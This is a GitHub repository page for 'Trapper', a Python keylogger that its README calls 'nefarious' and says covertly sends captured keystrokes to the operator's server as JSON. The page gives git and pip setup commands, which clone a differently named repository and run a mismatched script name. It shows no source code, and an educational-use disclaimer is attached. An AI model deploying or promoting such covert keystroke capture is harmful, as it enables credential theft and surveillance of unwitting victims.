Skip to content

A simple but nefarious Keylogger in python with minimal codebase and robust functionalitiy.

Notifications You must be signed in to change notification settings

g4ngst4r/Trapper

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 

Repository files navigation

Trapper

A simple but nefarious Python Keylogger with minimal dependencies (pynput & requests) that will hiddenously sending data to your server in JSON Format

This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!

Installation (with git and python dependency)

Open Terminal and Write: git clone https://github.com/davidbombal/python-keylogger.git

Type in the terminal. cd python-keylogger

Upgrade your virtual environment on Windows Machine pip install --upgrade virtualenv

Create Virtual Environment in Windows. Using command python -m venv keylogger_env

Activating the Virtual Environment keylogger_env\Scripts\activate

Run the command to install all the packages required in your virtual environment. pip install -r requirements.txt

For running the program , Run command python Tapper.py

About

A simple but nefarious Keylogger in python with minimal codebase and robust functionalitiy.

Resources

Stars

Watchers

Forks

Languages